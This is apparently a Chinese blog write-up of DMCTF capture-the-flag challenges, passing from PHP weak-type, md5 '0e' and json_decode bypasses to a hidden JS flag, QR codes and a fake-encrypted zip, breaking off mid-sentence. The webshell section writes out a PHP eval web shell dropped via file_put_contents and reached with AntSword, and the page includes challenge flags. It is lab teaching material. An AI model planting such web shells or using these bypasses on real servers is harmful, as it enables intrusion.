DMCTF

web

weak_type

打开进入环境可以看到一段php代码,进行分析可得需3步得出flag

1.需get传num使得intval($num,0)===202020020可过leve1,===是比较值和类型是否都相等,所以可以让num=+202020020即可

2.分析可得leve2通关条件是get传v1,v2且v1,v2经过md5加密后v1=v2即可。md5哈希之后都是0e开头的,所以传入开头是0e的v1,v2就行

3.分析为json绕过。json_decode — 对 JSON 格式的字符串进行编码,搜索json绕过构造钥匙message={“key”,0}可得出flag(输入一个json类型的字符串,json_decode函数解密成一个数组,判断数组中key的值是否等于$ key的值,但是$key的值我们不知道,但是可以利用0=="admin"这种形式绕过,最终payload message={“key”:0})。最后得到flag

fungame

打开后是一个有趣的游戏,一般通关就能得flag,于是我打到了最后一关,但关卡设计太过人性,最后没得到。又想到flag就在游戏代码里,于是F12查看源码。

最后找到了这串字符:\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C推断可能是flag。看特点可知它是js解密得flag:DMCTF{flag_is_here}

p3’webshell

打开靶机可看到一段代码。分析可得要post传参绕过if上传木马

先看一下题目给的提示,得知原题中的意思是post传参要匹配到preg_match函数中的任意一个即可绕过if

先post上传command=phpinfo();上传成功了(图片上传不成功…)

然后在下面构造木马,试了好多方式…最后上传成功的是

m a = ′ < ? p h p e v a l ( ma = '<?php eval( ma=<?phpeval(_REQUEST[cmd]);?>’;
file_put_contents(‘muma.php’, $ma);

打开蚁剑链接

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-McyflHhw-1607340132390)(file:///C:\Users\XZB\Documents\Tencent Files\1664832569\Image\C2C\0{@LP}9_6S0{06_Y9@UG$ME.png)]

添加完最后在根目录找到flag:flag{a4e6cc3d-bb42-4a52-ab91-e861b4d18cfc}

misc

SimpleQrcode

下载后得到一个变换的二维码,扫码得到几个字母推断完整的flag要把所有的二维码都扫一下。把文件拖进ps一个一个扫可得flag

Cheak In

签到题,flag就在题目上

fakezip

看题目是伪加密,下载完用winhex打开&#

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值